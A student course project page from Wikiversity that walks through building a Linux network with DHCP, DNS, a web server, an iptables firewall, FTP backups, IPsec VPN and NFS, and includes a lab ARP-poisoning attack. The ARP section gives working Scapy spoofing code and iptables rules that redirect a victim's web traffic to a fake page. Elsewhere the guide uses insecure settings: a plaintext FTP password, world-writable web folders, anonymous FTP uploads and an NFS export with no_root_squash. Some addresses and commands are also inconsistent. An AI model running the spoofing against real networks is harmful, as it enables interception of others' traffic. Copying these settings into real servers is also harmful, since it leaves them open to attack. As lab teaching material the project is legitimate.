Jump to content

Data Networking/Fall 2016/FYY

From Wikiversity

1. Fulin Shen 2. Yanxiao Lu 3. Yehui Rong

Motivation

[edit | edit source]

The development of Linux is one of the most prominent examples of free and open-source software collaboration, and this is our motivation to use Linux operating system to design a robust, effective and dynamic network solution for a start-up company, including the main and backup DNS server, DHCP server, web server, firewall, IPsec VPN, NFS and backup.

Behaviour of Protocols

[edit | edit source]

Domain Name System

[edit | edit source]

Domain Name System (DNS) controls the domain names of web server, translate them to Internet Protocol address. DNS is a protocol within the set of standards of how devices exchange data on the Internet. In this project, we design five records for the web server, including A, AAAA, NS, CNAME, and PTR types.

Dynamic Host Configuration Protocol

[edit | edit source]

Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e. a scope) configured for a given network. DHCP assigns an IP address when a system is started.

webserver

[edit | edit source]

LAMP (Linux, Apache, MySQL, and PHP) is the most popular solution to get a web server up and running. In this project, we use LAMP to set up a simple webpage so that clients can browse it with the DNS and DHCP server’s help.

Firewall

[edit | edit source]

The main function of a firewall is to provide security through couple rules applied to the server. Here we use the firewall to allow all the needed services and deny others to make our network secure and robust.

File Transfer Protocol

[edit | edit source]

File transfer protocol offers the backup to the server to avoid the whole network crush if the main server is malfunction. FTP is built both on the client and server, use different control and data connections between the server and client. In the project, we design the policy to back up the whole web and SQL data every day, and clean the data every 30 days to save the space.

Arp Poison

[edit | edit source]

Arp (address resolution protocol) determines the MAC address of a device with an IP address. And the Arp poison is a network attack which exploits the transition from layer 3 to layer 2 addresses. Arp poison means that the hacker replaces the MAC address in the normal ARP message with a counterfeit one, then the hacker can take the role of man in the middle to spoof any traffic. In the project, we use a client to work as a hacker to attack another client. Every time when the normal client tries to login the webserver page, the hacker will replace the web page and display a fake website to the client.

IPsec VPN

[edit | edit source]

IPsec (Internet Protocol Security) is a protocol used to offer secure IP communications by authenticating and encrypting the messages between the peers. Here we design a IPsec VPN tunnel between two servers using the pre shared key.

Network File System

[edit | edit source]

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems, allowing the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. In this project, we create 2 clients to whom the shared file is available.

Installation Steps

[edit | edit source]

DHCP server

[edit | edit source]

Step1: Install DHCP
Command:

               sudo apt-get update
sudo apt-get install dhcp3-server

Step2: configure the network card
Command:

               sudo nano /etc/default/isc-dhcp-server

Find the line after ‘#’ and change the network card as ens33:

               # on what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="ens33"

Save and Exit

Step3: edit the dhcpd.conf file
Command:

               sudo nano /etc/dhcp/dhcpd.conf

Set the domain name and the domain-name servers:

               # option definitions common to all supported networks...
option domain-name "pawupa.com";
option domain-name-servers ns.pawupa.com;

Uncomment the following line:

               authoritative

Give the ip address poll and define the subnet:

               # A slightly different configuration for an internal subnet.
subnet 193.168.1.0 netmask 255.255.255.0 {
range 193.168.1.20 192.168.1.100;
option domain-name "pawupa.com";
option domain-name-servers ns1.pawupa.com;
option domain-name-servers 193.168.1.102;
option domain-name-servers ns2.pawupa.com;
option domain-name-servers 193.168.1.103;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}

Give fixed address to the web server, DNS server, DNS standby server and three clients:

               host web {
hardware Ethernet 00:0c:29:65:f0:5e;
fixed-address 193.168.1.1;
}
host dns {
hardware Ethernet 00:0c:29:43:e7:1a;
fixed-address 193.168.1.102;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
host dnsstandby {
hardware Ethernet 00:0c:29:c5:44:bd;
fixed-address 193.168.1.103;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}

And I give three clients 193.168.1.104, 193.168.1.105, 193.168.1.106 as the method above.

Step 4: give the static address to the DHCP server
Command:

               sudo nano /etc/network/interfaces
Configuration of interfaces:
# interfaces(5) file used by ifup (8) and ifdown (8)
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet static
address 193.168.1.200
netmask 255.255.255.0
network 193.168.1.0
broadcast 193.168.1.255
gateway 193.168.1.1
iface ens33 inet6 static
address 1199::1
netmask 64

DHCP IPv6 configuration
Step 5: open the IPv6 configuration
Command

               sudo nano /etc/sysctl.conf

Make the changes as shown below:

               net.ipv6.conf.all.forwarding=1

Run sysctl –p to make it effective.

Step 6: install radvd
Command:

               sudo apt-get install radvd

Step7: configure the IPv6 address pool
Command:

               sudo nano /etc/radvd.conf
interface ens33
{
advSendAdvert on;
prefix 1199::/64
{
};
};

Step 8: give the DHCP server a fixed address
Just as shown in step 4

Step 9: configure the DHCP server to access website through domain name
Command:

               sudo nano /etc/resolv.conf
nameserver 193.168.1.102
nameserver 193.168.1.103

step 10: restart and check the dhcp server after configuration
Command:

               sudo networking restart
sudo /etc/init.d/isc-dhcp-server restart
sudo service isc-dhcp-server status

Master DNS

Step 1: Install bind9
Command:

               sudo apt-get install bind9   

After install bind9, we will get configuration files named.conf, named.conf.options, and named.conf.local in

Step 2: Demand
We want to make this host as master DNS, and can resolve
www.pawupa.com 193.168.1.1(webserver)
And add five records
Thus, we need to add
Forward Lookup Zones “pawupa.com”
Backward Lookup Zones “1.168.193.in-addr.arpa”
Another Backward Lookup Zones for IPV6 “0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa”

Step 3: Edit configuration file “named.conf.local”
Add the forward and backward lookup zones
Command:

               sudo vi named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type master;
file "/etc/bind/revip6.pawupa.com";
};

Step 4: Add files of zones
Copy a zone “db.local” to pawupa.com
Copy a zone “db.local” to rev.pawupa.com
Copy a zone “db.local” to revip6.pawupa.com
Command:

               sudo cp /etc/bind/db.local /etc/bind/pawupa.com
sudo cp /etc/bind/db.local /etc/bind/rev.pawupa.com
sudo cp /etc/bind/db.local /etc/bind/revip6.pawupa.com

Step 5: Edit files of zones
Command:

               sudo vi pawupa.com
 ;
 ; BIND data file for local loopback interface
 ;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6  ; Serial
604800  ; Refresh
86400  ; Retry
2419200  ; Expire
604800 )  ; Negative Cache TTL
 ;
@ IN NS ns.pawupa.com.
@ IN A 193.168.1.102
@ IN AAAA 1199::1111
ns IN A 193.168.1.102
ns IN AAAA 1199::1111
www IN A 193.168.1.1
www IN AAAA 1199::2222
oh IN CNAME www
diao IN CNAME www
wu IN CNAME www
pan IN CNAME www
sudo vi rev.pawupa.com
 ;
 ; BIND reverse data file for local loopback interface
 ;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6  ; Serial
604800  ; Refresh
86400  ; Retry
2419200  ; Expire
604800 )  ; Negative Cache TTL
 ; @ IN NS ns.pawupa.com.
102 IN PTR ns.pawupa.com.
1 IN PTR www.pawupa.com.
1 IN PTR diao.pawupa.com.
1 IN PTR oh.pawupa.com.
1 IN PTR wu.pawupa.com.
1 IN PTR pan.pawupa.com.
sudo vi revip6.pawupa.com
 ;
 ; BIND reverse data file for local loopback interface
 ;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6  ; Serial
604800  ; Refresh
86400  ; Retry
2419200  ; Expire
604800 )  ; Negative Cache TTL
 ;
@ IN NS ns.pawupa.com.
1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR ns.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR www.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR diao.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR oh.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR wu.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR pan.pawupa.com.

Step 6: Restart DNS service
Command:

               sudo /etc/init.d/bind9 restart

Slave DNS

Step 1: Edit configuration file “named.conf.local”
Add “allow-transfer { 193.168.1.103; }; “ to each zone, that synchronize the configuration of zones from master to slave. If master DNS cannot use, the slave DNS will help it to resolve.
(193.168.1.103 is the IP address of slave DNS)

Command:

               sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa "{
type master;
file "/etc/bind/revip6.pawupa.com";
allow-transfer { 1199::5555; };
};

Step 2: Install bind9 to another host (slave DNS)
Command:

               sudo apt-get install bind9   

Step 3: Edit configuration file “named.conf.local” in slave DNS host
Add the forward and backward lookup zones
Command:

               sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type slave;
file "/etc/bind/slaves/pawupa.com";
masters { 193.168.1.102; };
};
zone "1.168.193.in-addr.arpa"{
type slave;
file "/etc/bind/slaves/rev.pawupa.com";
masters { 193.168.1.102; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type slave;
file "/etc/bind/slaves/revip6.pawupa.com";
masters { 1199::1111; };
};

Step 4: Change the authority of "/etc/bind”
Command:

              sudo /etc/apparmor.d/usr.sbin.named
change "/etc/bind/**r" to "/etc/bind/**rw"

Step 5: Restart apparmor
Command:

              sudo /etc/init.d/apparmor restart

Step 6: Restart DNS service
The configuration of zones files will be synchronized by master DNS
Command:

               sudo /etc/init.d/bind9 restart

Web Server

[edit | edit source]


Step 1: Install Apache
Command:

               sudo apt-get update 
sudo apt-get install apache2


Step 2: Install PHP
Command:

               sudo apt-get install php      


Step 3: Install MySQL, password “linux”
Command:

               sudo apt-get install mysql-server        


Step 4: Check mysql is working
Command:

               sudo netstat –tap | grep mysql    


Step 5: Install phpmyadmin using the apache2 and myql-server with password linux
Command:

               sudo apt-get install phpmyadmin      

Step 6: Change the authority of /var/www
Command:

               sudo chmod 777 /var/www      

Step 7: Create the phpmyadmin link
Command:

               sudo ln –s /usr/share/phpmyadmin /var/www/html       


Step 8: Create a basic webpage “Index.htm”

Step 9: Change the default webpage catalog “/var/www” to “/home/fulin”
Command:

               sudo vi /etc/apache2/apache2.conf


Step 10: Change the default webpage catalog “/var/www/html” to “/home/fulin”
Command:

               Sudo vi /etc/apache2/sites-available/000-default.conf


Step 11: Restart the apache
Command:

               sudo /etc/init.d/apache2 restart  


Step 11: Use the browser on mac to connect the web page of the web server in VM


Firewall

[edit | edit source]


Step 1: List the current rules that are configured for iptables
Command:

               sudo iptables –L


Step 2: Accept your current SSH connection
Command:

               sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT


Step 3: Accept SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN
Command:

               sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT


Step 4: Accept services on the computer communicate with each other by sending network packets to each other
Command:

               sudo iptables -I INPUT 1 -i lo -j ACCEPT

Step 5: Accept all traffic on loopback interface
Command:

               sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT

Step 6: Allow Established Outgoing Connections
Command:

               sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT

Step 7: Internal to External
Command:

               sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT

Step 8: Drop Invalid Packets
Command:

               sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP

Step 9: Deny ping
Command:

               Sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT

Step 10: Limit 10 connection for every client
Command:

               sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT

Step 11: Prevent HTTP flood
Command:

               sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT

Step 12: Block an IP Address
Command:

               sudo iptables -I INPUT -s 193.168.1.104 -j DROP

Step 13: Cancel the block IP address
Command:

               sudo iptables -D INPUT -s 193.168.1.104 -j DROP

Step 14: Permit VPN
Command:

               Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT
Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT
Sudo iptables –A INPUT –p esp –j ACCEPT

Step 15: Deny any other
Command:

               sudo iptables –A INPUT –j DROP

Step 16: In order to preserve your IPTABLES rules upon reboot, install iptables-persistant
Command:

               sudo apt-get install iptables-persistent

Step 17: If you make any changes to the rules, run the following commands so you don’t lose them during a system reboot
Command:

               sudo netfilter-persistent save
sudo netfilter-persistent reload


Back UP

[edit | edit source]

Step 1: Install ftp
Command:

               Sudo apt-get install vsftpd

Step 2: Start ftp server
Command:

               Service vsftpd start 

Step 3: Create ftp script “testftp.sh”

               #!/bin/sh
FTP_IP=193.168.1.104
FTP_USER=fulinshen
FTP_PASS=sflin911911
FTP_backup=/home/fulinshen/test
BK_DR=/home/fulin/varcopy
DB_DR=/var
DAYS=30
LINUX_USER=fulinshen
date=` date +%Y%m%d `
tar zcvf $BK_DR/test$date.tar.gz $DB_DR
chown -R $LINUX_USER:$LINUX_USER $BK_DR
find $BK_DR -name "test*" -type f -mtime +$DAYS -exec rm {} \;
deldate=` date -d -30day +%Y%m%d `
ftp -i -v -n $FTP_IP << END
user $FTP_USER $FTP_PASS
binary
cd $FTP_backup
lcd $BK_DR
mput test$date.tar.gz
mdelete test$deldate.tar.gz
bye

Step 4: Add authority to script
Command:

               Chmod +x /home/fulin/varcopy/testftp.sh

Step 5: Change configuration of ftp

               sudo vi /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES

Step 6: Add kernel module to allow passive ftp

               modprobe ip_conntrack_ftp

Step 7: Restart ftp service and check the status
Command:

               service vsftpd restart
service vsftpd status

Step 8: Add rule to commit the script every day at 14:40 PM
Command:

               Sudo vi /etc/crontab
40 14 * * * root sh /home/fulin/varcopy/testftp.sh >/dev/null 2>&1

Step 9: Restart cron service and check the status
Command:

               service cron restart
service cron status

Arp poison

[edit | edit source]

Step 1: Install scapy
Command:

               sudo apt-get install tcpdump python3-crypto ipython3
sudo apt install python-scapy
sudo apt install sysv-rc-conf

Step 2: Use root
Command:

               Sudo passwd root 

Step 3: Start iptables after reboot
Command:

               sysv-rc-conf --level 2345 iptables on

Step 4: Turn on IP forwarding
Command:

               echo 1 > /proc/sys/net/ipv4/ip_forward

Step 5: Configure Scapy arp poison
Command:

               scapy
op=2
victim= '193.168.1.105'
spoof= '193.168.1.1' //gateway IP
mac='00:0c:29:73:56:67' // victim mac address
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
op =1
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
send(arp,inter=2,count=1000) // send arp every 2 seconds, 1000 counts

Step 6: Create fake web page
Command:

               /etc/init.d/apache2 start
echo “WOW,YOU WON THE POWER BALL JACKPOT.” > /home/fulinshen/index.htm

Step 7: Then configure your IP Tables to forward all traffic except HTTP traffic. For HTTP traffic, we will return our own site instead (193.168.1.104 is the IP address of hacker)
Command:

               iptables -t nat --flush
iptables --zero
iptables -A FORWARD --in-interface ens33 -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 193.168.1.104

IPsec VPN

[edit | edit source]

Step 1: Inatall strongswan
Command:

               sudo apt-get install strongswan

Step 2: Install Opensc
Command:

               Sudo apt-get install opensc

Step 3: Install GMP library
Command:

               Sudo apt-get install libgmp10

Step 4: Install development library of GMP
Command:

               Sudo apt-get install libgmp-dev

Step 5: Install Openssl libcrypto
Command:

               Sudo apt-get install libssl-dev

Step 6: Under /usr/src/ folder, download the Strongswan
Command:

               cd /usr/src
wget https://download.strongswan.org/strongswan-5.5.0.tar.gz

Step 7: Extract the compressed file
Command:

               tar –xzf strongswan-5.5.0.tar.gz

Step 8: Run the configure script to check the dependencies of strongswan
Command:

               cd strongswan-5.5.0
./configure –help | grep pkcs

Step 9: Run the configure script, use prefix /usr/local and enable openssl support
Command:

               ./configure --prefix=/usr/local  --enable-openssl

Step 10: Run the following two commands to compile and install strongswan under /usr/local directory
Command:

               make
make install

Step 11: Under /usr/local/etc path, Pre-share key based tunnel
One side ipsec.conf configuration:

               config setup
charondebug="all"
uniqueids=yes
strictcrlpolicy=no
conn %default
conn tunnel #
left=193.168.1.1
leftsubnet=192.168.223.0/24
right=193.168.1.104
rightsubnet=192.168.222.0/24
ike=aes256-sha2_256-modp1024!
esp=aes256-sha2_256!
keyingtries=0
ikelifetime=1h
lifetime=8h
dpddelay=30
dpdtimeout=120
dpdaction=restart
authby=secret
auto=start
keyexchange=ikev2
type=tunnel
ipsec.secrets file configuration:
193.168.1.1 193.168.1.104 : PSK ‘linux’
Another side ipsec.conf configuration:
config setup
charondebug="all"
uniqueids=yes
strictcrlpolicy=no
conn %default
conn tunnel #
left=193.168.1.104
leftsubnet=192.168.1.0/24
right=193.168.1.1
rightsubnet=192.168.2.0/24
ike=aes256-sha2_256-modp1024!
esp=aes256-sha2_256!
keyingtries=0
ikelifetime=1h
lifetime=8h
dpddelay=30
dpdtimeout=120
dpdaction=restart
authby=secret
auto=start
keyexchange=ikev2
type=tunnel
ipsec.secrets file configuration:
193.168.1.104 193.168.1.1 : PSK ‘linux’

Step12: After changes at both sides, create tunnel
Command:

               Sudo ipesc restart

Step 13: Check the status of tunnel on both machines
Command:

               Sudo ipsec statusall

Step 14: Test
One server ping another:

               Ping –s 4048 193.168.1.104

At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be.):

               Sudo watch ipsec statusall 

NFS-Server

Step 1: Inatall nfs-kernel-server
Command:

               sudo apt-get install nfs-kernel-server
sudo apt-get install rpcbind

Step 2: Make share folder
Command:

               mkdir /home/reve001/Desktop/nfs

Step 3: Edit configuration
Command:

               sudo vi /etc/exports
/home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)

Step 4: Restart service
Command:

               sudo service rpcbind restart restart
sudo service restartnfs-kernel-server restart

Step 5: Test
Command:

               showmount -e
               Export list for ubuntu:
/home/reve001/Desktop/nfs *

NFS-Clients

Step 1: Inatall nfs-common for clients
Command:

               sudo apt-get install nfs-common
sudo apt-get install rpcbind

Step 2: Make share folder
Command:

               mkdir /home/fulinshen/Desktop/nfs

Step 3: Mount the share file
Command:

               sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

Step 4: Mount this share file when turn on the client
Command:

               sudo vi /etc/rc.local
sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs

Test Plan

[edit | edit source]

DHCP Test

[edit | edit source]

Step 1: Start the DHCP server.
Step 2: Start all the other clients, use “ifconfig” command to check whether or not the IP address is correctly received from the DHCP server.

Webserver Test

[edit | edit source]

Step 1: Start the web server.
Step 2: At the client side, open the browser and enter the IP address of the webserver to check whether or not the right web page can be displayed.

DNS Test

[edit | edit source]

Step 1: Start the DNS server.
Step 2: At the client side, open the browser again and this time enter the domain name of the webserver instead of the IP address, check whether or not the right web page can be displayed.

Firewall Test

[edit | edit source]

Step 1: At a client side, open the browser to surf the web page.
Step 2: Add an IPtable to deny the client browsing the web server.
Step 3: At a client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed.
Step 4: Delete the IPtable to allow the client browsing the web server again.
Step 5: Again at the client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed.
Step 6: When all the other IPtable rules existing, test the whole functions of the project to check whether or not these functions are working well or not.

Backup Test

[edit | edit source]

Step 1: Start the FTP server.
Step 2: Change the ftp configuration to enable the backup process in the next couple minutes, restart the ftp server.
Step3: When the designed time arrives, check whether or not the files are backed up to the local file folder and the remote device’s file folder too.

Arp Poison Test

[edit | edit source]

Step 1: Start the normal web server and the hacker’s web server.
Step 2: The hacker to send fake ARP message to the client.
Step 3: The client opens the browser to enter the normal web page, check whether or not the client will the fake web page instead of the normal page.

IPsec VPN Test

[edit | edit source]

Step 1: One server ping another (Ping –s 4048 193.168.1.104).
Step 2: At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be), using command “Sudo watch ipsec statusall”.

NFS Test

[edit | edit source]

Step 1: Start NFS server and client.
Step 2: Put a file to the shared folder on the client server.
Step 3: At the server side, check whether or not the file exists.

References

[edit | edit source]

Websites Referred:
1. https://oitibs.com/easy-ubuntu-16-server-firewall/
2. https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-using-iptables-on-ubuntu-14-04
3 .https://www.howtoforge.com/tutorial/strongswan-based-ipsec-vpn-using-certificates-and-pre-shared-key-on-ubuntu-16-04/
4. http://www.tuicool.com/articles/AzEbii
5. http://wiki.ubuntu.com.cn/%E5%AE%89%E8%A3%85DHCP
6. https://en.wikipedia.org/wiki/Domain_Name_System
7. https://en.wikipedia.org/wiki/Network_File_System
Books Referred:
1. Computer Networking: A Top-Down Approach, 6/e James F. Kurose, Keith W. Ross